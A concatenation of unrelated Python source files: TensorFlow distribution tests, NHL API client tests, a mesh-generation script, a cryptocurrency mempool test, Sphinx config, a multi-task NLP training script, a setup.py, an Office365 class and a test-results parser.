self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenLowerRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [1., 0]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfForOneVoteIsTheMeanWithOneRecordInput(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts = np.zeros((3), dtype=np.float32)
counts[class_num] = 1
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
mean = dist.mean().eval()
pmf = dist.pmf(counts).eval()
self.assertAllClose(mean[class_num], pmf)
self.assertTupleEqual((3,), mean.shape)
self.assertTupleEqual((), pmf.shape)
def testMeanDoubleTwoVotes(self):
# The probabilities of two votes falling into class k for
# DirichletMultinomial(2, alpha) is twice as much as the probability of one
# vote falling into class k for DirichletMultinomial(1, alpha)
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts_one = np.zeros((3), dtype=np.float32)
counts_one[class_num] = 1.
counts_two = np.zeros((3), dtype=np.float32)
counts_two[class_num] = 2
dist1 = tf.contrib.distributions.DirichletMultinomial(1., alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(2., alpha)
mean1 = dist1.mean().eval()
mean2 = dist2.mean().eval()
self.assertAllClose(mean2[class_num], 2 * mean1[class_num])
self.assertTupleEqual((3,), mean1.shape)
def testVariance(self):
# Shape [2]
alpha = [1., 2]
ns = [2., 3., 4., 5.]
alpha_0 = np.sum(alpha)
# Diagonal entries are of the form:
# Var(X_i) = n * alpha_i / alpha_sum * (1 - alpha_i / alpha_sum) *
# (alpha_sum + n) / (alpha_sum + 1)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
# Off diagonal entries are of the form:
# Cov(X_i, X_j) = -n * alpha_i * alpha_j / (alpha_sum ** 2) *
# (alpha_sum + n) / (alpha_sum + 1)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [2, 2].
shared_matrix = np.array([
[variance_entry(alpha[0], alpha_0),
covariance_entry(alpha[0], alpha[1], alpha_0)],
[covariance_entry(alpha[1], alpha[0], alpha_0),
variance_entry(alpha[1], alpha_0)]])
with self.test_session():
for n in ns:
# n is shape [] and alpha is shape [2].
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
variance = dist.variance()
expected_variance = n * (n + alpha_0) / (1 + alpha_0) * shared_matrix
self.assertEqual((2, 2), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_n_alpha_broadcast(self):
alpha_v = [1., 2, 3]
alpha_0 = 6.
# Shape [4, 3]
alpha = np.array(4 * [alpha_v], dtype=np.float32)
# Shape [4, 1]
ns = np.array([[2.], [3.], [4.], [5.]], dtype=np.float32)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [4, 3, 3]
shared_matrix = np.array(4 * [[
[variance_entry(alpha_v[0], alpha_0),
covariance_entry(alpha_v[0], alpha_v[1], alpha_0),
covariance_entry(alpha_v[0], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[1], alpha_v[0], alpha_0),
variance_entry(alpha_v[1], alpha_0),
covariance_entry(alpha_v[1], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[2], alpha_v[0], alpha_0),
covariance_entry(alpha_v[2], alpha_v[1], alpha_0),
variance_entry(alpha_v[2], alpha_0)]]], dtype=np.float32)
with self.test_session():
# ns is shape [4, 1], and alpha is shape [4, 3].
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
variance = dist.variance()
expected_variance = np.expand_dims(
ns * (ns + alpha_0) / (1 + alpha_0), -1) * shared_matrix
self.assertEqual((4, 3, 3), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_multidimensional(self):
alpha = np.random.rand(3, 5, 4).astype(np.float32)
alpha2 = np.random.rand(6, 3, 3).astype(np.float32)
ns = np.random.randint(low=1, high=11, size=[3, 5, 1]).astype(np.float32)
ns2 = np.random.randint(low=1, high=11, size=[6, 1, 1]).astype(np.float32)
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(ns2, alpha2)
variance = dist.variance()
variance2 = dist2.variance()
self.assertEqual((3, 5, 4, 4), variance.get_shape())
self.assertEqual((6, 3, 3, 3), variance2.get_shape())
def testZeroCountsResultsInPmfEqualToOne(self):
# There is only one way for zero items to be selected, and this happens with
# probability 1.
alpha = [5, 0.5]
counts = [0., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(0., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1.0, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testLargeTauGivesPreciseProbabilities(self):
# If tau is large, we are doing coin flips with probability mu.
mu = np.array([0.1, 0.1, 0.8], dtype=np.float32)
tau = np.array([100.], dtype=np.float32)
alpha = tau * mu
# One (three sided) coin flip. Prob[coin 3] = 0.8.
# Note that since it was one flip, value of tau didn't matter.
counts = [0., 0, 1]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8, pmf.eval(), atol=1e-4)
self.assertEqual((), pmf.get_shape())
# Two (three sided) coin flips. Prob[coin 3] = 0.8.
counts = [0., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8**2, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
# Three (three sided) coin flips.
counts = [1., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(3., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(3 * 0.1 * 0.8 * 0.8, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
def testSmallTauPrefersCorrelatedResults(self):
# If tau is small, then correlation between draws is large, so draws that
# are both of the same class are more likely.
mu = np.array([0.5, 0.5], dtype=np.float32)
tau = np.array([0.1], dtype=np.float32)
alpha = tau * mu
# If there is only one draw, it is still a coin flip, even with small tau.
counts = [1., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.5, pmf.eval())
self.assertEqual((), pmf.get_shape())
# If there are two draws, it is much more likely that they are the same.
counts_same = [2., 0]
counts_different = [1, 1.]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf_same = dist.pmf(counts_same)
pmf_different = dist.pmf(counts_different)
self.assertLess(5 * pmf_different.eval(), pmf_same.eval())
self.assertEqual((), pmf_same.get_shape())
def testNonStrictTurnsOffAllChecks(self):
# Make totally invalid input.
with self.test_session():
alpha = [[-1., 2]] # alpha should be positive.
counts = [[1., 0], [0., -1]] # counts should be non-negative.
n = [-5.3] # n should be a non negative integer equal to counts.sum.
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf(counts).eval() # Should not raise.
if __name__ == '__main__':
tf.test.main()
|
py | 1a3f5ebf71efac13b5a8db27fb1341f2d22c8c0e | from datetime import date
import pytest
from nhlapi.endpoints import NHLAPI
from nhlapi.utils import Season
class MockClient:
def get(self, url, params=None):
self.url = url
self.params = params
def test_teams():
mock = MockClient()
api = NHLAPI(mock)
api.teams(8, expand=["foo", "bar"], stats="single")
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams"
assert mock.params["teamId"] == "8"
assert mock.params["expand"] == "foo,bar"
assert mock.params["stats"] == "single"
def test_teams_stats():
mock = MockClient()
api = NHLAPI(mock)
api.team_stats(8)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams/8/stats"
def test_teams_divisions():
mock = MockClient()
api = NHLAPI(mock)
api.divisions()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions"
def test_teams_divisions_id():
mock = MockClient()
api = NHLAPI(mock)
api.divisions(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions/1"
def test_teams_conferences():
mock = MockClient()
api = NHLAPI(mock)
api.conferences()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences"
def test_teams_conferences_id():
mock = MockClient()
api = NHLAPI(mock)
api.conferences(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences/1"
def test_people_simple():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000"
def test_people_stats():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000, stats="single", stats_season=Season(end=2018))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000/stats"
assert mock.params["stats"] == "single"
assert mock.params["season"] == "20172018"
def test_schedule_date():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(expand=["foo", "bar"], date=date(2018, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["expand"] == "foo,bar"
assert mock.params["date"] == "2018-01-01"
def test_schedule_team_range():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(8, start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["teamId"] == "8"
assert mock.params["startDate"] == "2018-01-01"
assert mock.params["endDate"] == "2018-06-01"
def test_schedule_bad_args():
mock = MockClient()
api = NHLAPI(mock)
with pytest.raises(ValueError):
api.schedule(date=date.today(), start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
def test_standings_season():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", season=Season(2017))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["season"] == "20172018"
def test_standings_date():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", date=date(2017, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["date"] == "2017-01-01"
def test_standings_bad_args():
mock = MockClient()
api = NHLAPI(mock)
with pytest.raises(ValueError):
api.standings(date=date.today(), season=Season(end=2018))
|
py | 1a3f5ef15827d8b5f9be2376fe533b04efd83bef | import pygmsh as pg
from params import height, width, dist_center, inlet_width, inlet_depth, line_sep, ymin1, ymin2
from params import INMOUTH1, INMOUTH2, OUTMOUTH1, OUTMOUTH2, INLET1, INLET2, OUTLET1, OUTLET2, WALLS, DOMAIN
def main():
#geom = pg.built_in.Geometry()
size = 0.02
geom = pg.opencascade.Geometry(
characteristic_length_min=size, characteristic_length_max=size)
main_rect = geom.add_rectangle([0.0, 0.0, 0.0], width, height)
mouth_inlet1 = geom.add_rectangle([-inlet_depth, ymin1, 0.0], inlet_depth, inlet_width)
mouth_inlet2 = geom.add_rectangle([-inlet_depth, ymin2, 0.0], inlet_depth, inlet_width)
mouth_outlet1 = geom.add_rectangle([width, ymin1, 0.0], inlet_depth, inlet_width)
mouth_outlet2 = geom.add_rectangle([width, ymin2, 0.0], inlet_depth, inlet_width)
print("ymin1 :{}".format(ymin1))
print("ymin2 :{}".format(ymin2))
geom.add_physical(mouth_inlet1, INMOUTH1)
geom.add_physical(mouth_inlet2, INMOUTH2)
geom.add_physical(mouth_outlet1, OUTMOUTH1)
geom.add_physical(mouth_outlet2, OUTMOUTH2)
geom.add_physical([main_rect], DOMAIN)
heat_exchanger = geom.boolean_fragments([main_rect], [mouth_inlet1, mouth_inlet2, mouth_outlet1, mouth_outlet2])
geom.add_raw_code("""vb1[] = Boundary{{Surface{{ {0} }};}};
vb2[] = Boundary{{Surface{{ {1} }};}};
vb3[] = Boundary{{Surface{{ {2} }};}};
vb4[] = Boundary{{Surface{{ {3} }};}};
vb0[] = Boundary{{Surface{{ {4} }};}};"""
.format(mouth_inlet1.id,
mouth_inlet2.id,
mouth_outlet1.id,
mouth_outlet2.id,
main_rect.id
))
geom.add_raw_code("""Physical Curve({0}) = {{vb0[],
vb1[0], vb1[2],
vb2[0], vb2[2],
vb3[0], vb3[2],
vb4[0], vb4[2]}};"""
.format(WALLS)
)
geom.add_raw_code("Physical Curve({0}) -= {{-vb1[1], -vb2[1], -vb3[3], -vb4[3]}};\n \
Physical Curve({1}) = {{vb1[3]}};\n \
Physical Curve({2}) = {{vb3[1]}};\n \
Physical Curve({3}) = {{vb2[3]}};\n \
Physical Curve({4}) = {{vb4[1]}};"
.format(WALLS, INLET1, OUTLET1, INLET2, OUTLET2))
mesh = pg.generate_mesh(geom, geo_filename="2D_mesh.geo")
import meshio
meshio.write("2D_mesh_heat_exchanger.vtk", mesh)
if __name__ == '__main__':
main()
|
py | 1a3f5f8dd79ee781d36173aed4b460ad09f672be | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework.test_framework import FatbitTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolCoinbaseTest(FatbitTestFramework):
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def create_tx(self, from_txid, to_address, amount):
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
signresult = self.nodes[0].signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
# mempool should contain all the transactions again, all unconfirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
py | 1a3f5fcac8a7a7164338494fdabdbf7924227d74 | # flake8: noqa
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import datetime
import os
import re
import sys
catalyst_root_path = "../"
sys.path.insert(0, os.path.abspath(catalyst_root_path))
# -- Project information -----------------------------------------------------
project = "Catalyst"
copyright = "{}, Scitator".format(datetime.datetime.now().year)
author = "Sergey Kolesnikov"
docs_repo = "catalyst"
docs_user = "catalyst-team"
releases_github_path = "catalyst-team/catalyst"
def get_version(mode: str = "full") -> str:
"""
@TODO: Docs. Contribution is welcome
"""
current_dir = os.path.abspath(os.path.dirname(__file__))
root = os.path.dirname(current_dir)
version_file = os.path.join(root, "catalyst", "__version__.py")
if not os.path.exists(version_file):
version_file = os.path.join(root, "__version__.py")
version_ = "1.0"
try:
with open(version_file) as f:
version_ = re.search(
r'^__version__ = [\'"]([^\'"]*)[\'"]', f.read(), re.M
).group(1)
except Exception:
pass
if mode == "short":
try:
version_ = re.search(r"^(\d+\.\d+)", version_, re.M).group(1)
except Exception:
pass
return version_
# The short X.Y version
version = get_version("short")
# The full version, including alpha/beta/rc tags
release = get_version("full")
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = "1.0"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named "sphinx.ext.*") or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
# "releases",
]
autodoc_inherit_docstrings = False
napoleon_google_docstring = True
napoleon_include_init_with_doc = True
napoleon_numpy_docstring = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = [".rst", ".md"]
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# Ignoring Third-party packages
autodoc_mock_imports = [
"alchemy",
"neptune",
"wandb",
"gym",
"gridfs",
"pymongo",
"redis",
]
# autodoc_default_flags = [
# "members", "undoc-members", "private-members",
# "special-members", "inherited-members", "show-inheritance"
# ]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "catalyst_sphinx_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {}
# html_theme_options = {
# "display_version": True,
# "prev_next_buttons_location": "bottom",
# "collapse_navigation": False,
# "sticky_navigation": True,
# "navigation_depth": 4,
# }
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
html_short_title = "Catalyst DL R&D"
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don"t match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``["localtoc.html", "relations.html", "sourcelink.html",
# "searchbox.html"]``.
#
# html_sidebars = {}
html_context = {
"display_github": True,
"source_url_prefix": (
f"https://github.com/{docs_user}/{docs_repo}/tree/master/docs"
),
"github_host": "github.com",
"github_user": docs_user,
"github_repo": docs_repo,
"github_version": "master",
"conf_py_path": "/docs/",
"source_suffix": ".rst",
}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "Catalystdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ("letterpaper" or "a4paper").
#
# "papersize": "letterpaper",
# The font size ("10pt", "11pt" or "12pt").
#
# "pointsize": "10pt",
# Additional stuff for the LaTeX preamble.
#
# "preamble": "",
# Latex figure (float) alignment
#
# "figure_align": "htbp",
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"Catalyst.tex",
"Catalyst Documentation",
"Scitator",
"manual",
),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "catalyst", "Catalyst Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"Catalyst",
"Catalyst Documentation",
author,
"Catalyst",
"One line description of project.",
"Miscellaneous",
),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ""
# A unique identification for the text.
#
# epub_uid = ""
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# -- Extension configuration -------------------------------------------------
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
|
py | 1a3f6049f0f14056397374f8d92f3e0caf2609e7 | # coding=utf-8
import paddlepalm as palm
import json
if __name__ == '__main__':
max_seqlen = 512
batch_size = 4
num_epochs = 2
lr = 1e-3
vocab_path = './pretrain/ernie/vocab.txt'
train_file = './data/cls4mrqa/train.tsv'
predict_file = './data/cls4mrqa/dev.tsv'
config = json.load(open('./pretrain/ernie/ernie_config.json'))
# ernie = palm.backbone.ERNIE(...)
ernie = palm.backbone.ERNIE.from_config(config)
# cls_reader2 = palm.reader.cls(train_file_topic, vocab_path, batch_size, max_seqlen)
# cls_reader3 = palm.reader.cls(train_file_subj, vocab_path, batch_size, max_seqlen)
# topic_trainer = palm.Trainer('topic_cls', cls_reader2, cls)
# subj_trainer = palm.Trainer('subj_cls', cls_reader3, cls)
# Create the reader for this classification task. Its many parameters control the dataset input format, number of files, preprocessing rules, etc.
cls_reader = palm.reader.ClassifyReader(vocab_path, max_seqlen)
    cls_reader2 = palm.reader.ClassifyReader(vocab_path, max_seqlen)
    predict_cls_reader = palm.reader.ClassifyReader(vocab_path, max_seqlen, phase='predict')
print(cls_reader.outputs_attr)
print(predict_cls_reader.outputs_attr)
    # Different backbones require different features from the task reader. For a classification task the basic input
    # features are token_ids and label_ids, but BERT additionally needs position, segment, input_mask and similar
    # features extracted from the input, so after registration the reader automatically adds the fields the backbone requires.
cls_reader.register_with(ernie)
cls_reader2.register_with(ernie)
print(cls_reader.outputs_attr)
    print(predict_cls_reader.outputs_attr)
    print("preparing data...")
    print(cls_reader.num_examples)
    cls_reader.load_data(train_file, batch_size, num_epochs=num_epochs)
    cls_reader2.load_data(train_file, batch_size)
print(cls_reader.num_examples)
print('done!')
    # Create the task head (e.g. classification, matching, machine reading comprehension). Each head has
    # required/optional parameters specific to its task. Note that heads and readers are decoupled: as long as the
    # reader can provide the dataset-side fields a head depends on, the combination is valid.
cls_head = palm.head.Classify(4, 1024, 0.1)
    cls_head2 = palm.head.Classify(4, 1024, 0.1)
    # Create trainers from the readers and task heads. A trainer represents one training task: it keeps the training
    # state and the key information of the task, performs validity checks, and controls model saving and loading.
    trainer = palm.Trainer('cls')
    trainer2 = palm.Trainer('senti_cls')
    mh_trainer = palm.MultiHeadTrainer([trainer, trainer2])
# match4mrqa.reuse_head_with(mrc4mrqa)
# data_vars = cls_reader.build()
# output_vars = ernie.build(data_vars)
# cls_head.build({'backbone': output_vars, 'reader': data_vars})
    loss_var = mh_trainer.build_forward(ernie, [cls_head, cls_head2])
    # Note: a head/backbone can only be built once, so do NOT call build_forward again on the individual trainers.
    n_steps = cls_reader.num_examples * num_epochs // batch_size
    warmup_steps = int(0.1 * n_steps)
    print(warmup_steps)
    sched = palm.lr_sched.TriangularSchedualer(warmup_steps, n_steps)
adam = palm.optimizer.Adam(loss_var, lr, sched)
mh_trainer.build_backward(optimizer=adam, weight_decay=0.001)
# mh_trainer.random_init_params()
mh_trainer.load_pretrain('pretrain/ernie/params')
# trainer.train(iterator_fn, print_steps=1, save_steps=5, save_path='outputs', save_type='ckpt,predict')
    mh_trainer.fit_readers_with_mixratio([cls_reader, cls_reader2], 'cls', 2)
    mh_trainer.train(print_steps=1)
    # trainer.save()
    print('prepare to predict...')
    pred_ernie = palm.backbone.ERNIE.from_config(config, phase='pred')
    cls_pred_head = palm.head.Classify(4, 1024, phase='pred')
    trainer.build_predict_forward(pred_ernie, cls_pred_head)
    predict_cls_reader.load_data(predict_file, 8)
    print(predict_cls_reader.num_examples)
    predict_cls_reader.register_with(pred_ernie)
    trainer.fit_reader(predict_cls_reader, phase='predict')
    print('predicting..')
    trainer.predict(print_steps=20)
    # controller = palm.Controller([mrqa, match4mrqa, mlm4mrqa])
    # loss = controller.build_forward(bb, mask_task=[])
    # n_steps = controller.estimate_train_steps(basetask=mrqa, num_epochs=2, batch_size=8, dev_count=4)
    # adam = palm.optimizer.Adam(loss)
    # sched = palm.schedualer.LinearWarmup(learning_rate, max_train_steps=n_steps, warmup_steps=0.1*n_steps)
    #
    # controller.build_backward(optimizer=adam, schedualer=sched, weight_decay=0.001, use_ema=True, ema_decay=0.999)
    # controller.random_init_params()
    # controller.load_pretrain('../../pretrain_model/ernie/params')
    # controller.train()
    # controller = palm.Controller(config='config.yaml', task_dir='tasks', for_train=False)
    # controller.pred('mrqa', inference_model_dir='output_model/secondrun/mrqa/infer_model')
|
py | 1a3f60672243893de1a93f2d81a10224abd387a3 | from setuptools import setup, find_packages
setup(
name='pf-python-communication',
version='1.0',
url='https://github.com/problemfighter/pf-python-communication',
license='Apache 2.0',
author='Touhid Mia',
author_email='[email protected]',
description='Problem Fighter Python Communication helper, such as Websocket, Email, push notification etc',
long_description=__doc__,
packages=find_packages(),
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
"flask-socketio"
],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
) |
py | 1a3f6074b7bbca6bc04fbae383572fcdb2f689f1 | from office365.directory.identities.userflows.b2x_identity_user_flow import B2XIdentityUserFlow
from office365.directory.identities.identity_provider_base import IdentityProviderBase
from office365.entity import Entity
from office365.entity_collection import EntityCollection
from office365.runtime.resource_path import ResourcePath
class IdentityContainer(Entity):
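    # Entry point for Microsoft Graph identity resources: exposes the tenant's external identity
    # providers and its B2X (self-service sign-up) user flows as child collections.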
@property
def identity_providers(self):
return self.properties.get('identityProviders',
EntityCollection(self.context, IdentityProviderBase,
ResourcePath("identityProviders", self.resource_path)))
@property
def b2x_user_flows(self):
return self.properties.get('b2xUserFlows',
EntityCollection(self.context, B2XIdentityUserFlow,
ResourcePath("b2xUserFlows", self.resource_path)))
|
py | 1a3f613ed41900ad3d85011a2532bb8f8ae7082e | # Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module is for processing test results from resultdb"""
import base64
import logging
from collections import defaultdict
from common.findit_http_client import FinditHttpClient
from go.chromium.org.luci.resultdb.proto.v1 import test_result_pb2
from infra_api_clients import http_client_util
from libs.test_results.base_test_results import BaseTestResults
from libs.test_results.classified_test_results import ClassifiedTestResults
from services import resultdb
_FAILURE_STATUSES = [
test_result_pb2.TestStatus.FAIL, test_result_pb2.TestStatus.CRASH,
test_result_pb2.TestStatus.ABORT
]
_FINDIT_HTTP_CLIENT = FinditHttpClient()
class ResultDBTestType(object):
OTHER = 'OTHER'
GTEST = 'GTEST'
BLINK = 'BLINK'
# TODO (crbug/981066): Implement this
# pylint: disable=abstract-method
class ResultDBTestResults(BaseTestResults):
def __init__(self, test_results, partial_result=False):
"""Creates a ResultDBTestResults object from resultdb test results
Arguments:
test_results: Array of luci.resultdb.v1.TestResult object
partial_result: False if the results are from a single shard, True if
the results are from all shards
"""
self.partial_result = partial_result
self.test_results = ResultDBTestResults.group_test_results_by_test_name(
test_results)
def GetFailedTestsInformation(self):
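    # Returns two dicts keyed by test name: the base64-encoded merged failure log of each
    # consistently failing test, and the set of tests treated as reliable failures.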
failed_test_log = {}
reliable_failed_tests = {}
for test_name, result in self.test_results.items():
if result["reliable_failure"]:
test_type = result["test_type"]
# TODO(crbug.com/981066): Consider running this in parallel
real_logs = map(
lambda l: ResultDBTestResults.get_detailed_failure_log(
test_type, l), result["failure_logs"])
merged_test_log = '\n'.join(real_logs)
failed_test_log[test_name] = base64.b64encode(merged_test_log)
reliable_failed_tests[test_name] = test_name
return failed_test_log, reliable_failed_tests
@property
def contains_all_tests(self):
"""
True if the test result is merged results for all shards; False if it's a
partial result.
"""
return not self.partial_result
def test_type(self):
for _, result in self.test_results.items():
return result["test_type"]
return ResultDBTestType.OTHER
def GetClassifiedTestResults(self):
"""Parses ResultDB results, counts and classifies test results.
Also counts number of expected and unexpected results for each test.
Returns:
(ClassifiedTestResults) An object with information for each test:
* total_run: total number of runs,
* num_expected_results: total number of runs with expected results,
* num_unexpected_results: total number of runs with unexpected results,
* results: classified test results in 5 groups: passes, failures, skips,
unknowns, notruns.
"""
classified_results = ClassifiedTestResults()
for test_name, test_info in self.test_results.items():
# We don't care about the tests that were skipped on purpose
if (test_info["num_passed"] == 0 and test_info["num_failed"] == 0 and
test_info["num_crashed"] == 0 and test_info["num_aborted"] == 0 and
test_info["num_notrun"] == 0 and test_info["num_unspecified"] == 0):
continue
classified_results[test_name].total_run = test_info["total_run"]
